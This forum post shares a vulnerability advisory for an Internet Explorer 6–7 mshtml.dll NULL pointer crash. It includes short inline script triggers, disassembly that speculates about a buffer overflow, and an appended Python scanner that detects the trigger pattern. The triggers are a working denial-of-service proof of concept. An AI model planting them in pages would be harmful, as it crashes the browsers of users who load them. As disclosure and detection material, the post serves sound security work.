But alex told me he wanted the forum to appear on SecurityFocus, Secunia and those.. so I'm going to publish this one.. and in ENGLISH! xD since they rejected one of mine about a bug in "OBJECT" because it was in Spanish

Here is the advisory..
in SPANISH:
Quote
== Affected Software ==
Microsoft Windows Explorer (Win2000-XP)
Microsoft Internet Explorer 6.*
Microsoft Internet Explorer 7.0
== Introduction ==
A NULL Pointer Exception has been found in Internet Explorer 5.0 and later
that could turn out to be a Buffer Overflow.
The error is caused in the mshtml.dll library, version 5.0 onward, including version 7.0 of the browser.
== Example ==
This error is generated in the mshtml.dll library in the following way:
<script>
for(i in history.go);
</script>
among other code with the same principle, such as:
<script>
for(i in document.location.reload);
</script>
or
<script>
for(i in document.appendChild);
</script>
etc..
== Explanation ==
The code makes ESI have a NULL value, so when this is called:
636B1AE6 8942 14 MOV DWORD PTR DS:[EDX+14],EAX
here! >>> 636B1AE9 FF36 PUSH DWORD PTR DS:[ESI]
636B1AEB 8D4A 04 LEA ECX,DWORD PTR DS:[EDX+4]
an error is generated.
It is important to clarify that, with access to the source code, or after
a more extensive analysis, a BoF could be found, since the value of ESI
becomes a return address after executing:
636B1B18 0FB741 10 MOVZX EAX,WORD PTR DS:[ECX+10]
636B1B1C 8B09 MOV ECX,DWORD PTR DS:[ECX]
636B1B1E 33D2 XOR EDX,EDX
636B1B20 391481 CMP DWORD PTR DS:[ECX+EAX*4],EDX
636B1B23 0F94C2 SETE DL
636B1B26 8BC2 MOV EAX,EDX
636B1B28 C3 RETN
which comes from:
636B2055 56 PUSH ESI
636B2056 8BF1 MOV ESI,ECX
636B2058 E8 BBFAFFFF CALL mshtml.636B1B18
As you can see if you place a trace on ESI.
== Author ==
SirDarckCat
elhacker.net
And in English.
Quote
NULL Pointer Exception and Possible BoF in Microsoft Internet Explorer 6-7
== Affected Software ==
Microsoft Windows Explorer (Win2000-XP)
Microsoft Internet Explorer 6.*
Microsoft Internet Explorer 7.0
== Introduction ==
We have found a NULL Pointer Exception in Internet Explorer 5.0 and later
that could possibly lead to a Buffer Overflow.
The bug is in the library mshtml.dll 5.0 and later, including version 7.0 of the browser; if there is no BoF it's only a DoS bug.
== Example ==
This bug in mshtml.dll is exploited in the following way:
<script>
for(i in history.go);
</script>
among other code that follows the same principle, like:
<script>
for(i in document.location.reload);
</script>
or:
<script>
for(i in document.appendChild);
</script>
etc..
== Explanation ==
The code makes ESI have a NULL value, so here:
636B1AE6 8942 14 MOV DWORD PTR DS:[EDX+14],EAX
here! >>> 636B1AE9 FF36 PUSH DWORD PTR DS:[ESI]
636B1AEB 8D4A 04 LEA ECX,DWORD PTR DS:[EDX+4]
a NULL Pointer Exception is created.
It's important to say that if the code of this library were public,
or after an intense analysis, a BoF could be found, because the value of ESI
becomes a return value on the return of this function:
636B1B18 0FB741 10 MOVZX EAX,WORD PTR DS:[ECX+10]
636B1B1C 8B09 MOV ECX,DWORD PTR DS:[ECX]
636B1B1E 33D2 XOR EDX,EDX
636B1B20 391481 CMP DWORD PTR DS:[ECX+EAX*4],EDX
636B1B23 0F94C2 SETE DL
636B1B26 8BC2 MOV EAX,EDX
636B1B28 C3 RETN
And it is called from:
636B2055 56 PUSH ESI
636B2056 8BF1 MOV ESI,ECX
636B2058 E8 BBFAFFFF CALL mshtml.636B1B18
As you can see if you debug the program.
== Author ==
SirDarckCat
elhacker.net
In case I have spelling mistakes, especially in the Spanish one (and in the English one), please tell me

Regards!!
PS. It would be sent on Monday.
By the way.. I'll publish it on Monday
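Added example (not part of SirDarckCat's advisory): a small Python scanner that flags the trigger pattern the advisory describes, a for-in loop over a member of a browser host object inside an inline <script>, so a gateway or page-triage script can spot such a DoS page before it reaches an unpatched IE. The HOST_OBJECTS list and the constructed SAMPLE page are assumptions, not data from the post.

```python
import re

# Host objects the advisory enumerates with for-in: history.go,
# document.location.reload, document.appendChild. 'location', 'window' and
# 'navigator' are added as an assumption (host objects of the same kind).
HOST_OBJECTS = ("history", "document", "location", "window", "navigator")

_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
# for ( [var] ident in <dotted member expression> )
_FOR_IN_RE = re.compile(
    r"for\s*\(\s*(?:var\s+)?[A-Za-z_$][\w$]*\s+in\s+"
    r"([A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)+)\s*\)"
)


def find_host_for_in(html):
    """Return [(expression, line)] for every for-in loop in an inline
    <script> whose right-hand side is a member of a browser host object."""
    hits = []
    for script in _SCRIPT_RE.finditer(html):
        body = script.group(1)
        for loop in _FOR_IN_RE.finditer(body):
            expr = loop.group(1)
            if expr.split(".")[0] in HOST_OBJECTS:
                # 1-based line number of the loop within the whole document
                line = html.count("\n", 0, script.start(1) + loop.start()) + 1
                hits.append((expr, line))
    return hits


# Constructed sample page: two advisory-style triggers and one harmless loop.
SAMPLE = """<html><body>
<script>
for(i in history.go);
</script>
<script>
var o = {a: 1};
for (var k in o) { }
</script>
<script>for(i in document.location.reload);</script>
</body></html>"""

if __name__ == "__main__":
    for expr, line in find_host_for_in(SAMPLE):
        print("line %d: for-in over host member %s" % (line, expr))
```

This is a heuristic for triage of page content only; it does not catch loops built from obfuscated or dynamically assembled script, and patching the browser remains the real fix.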
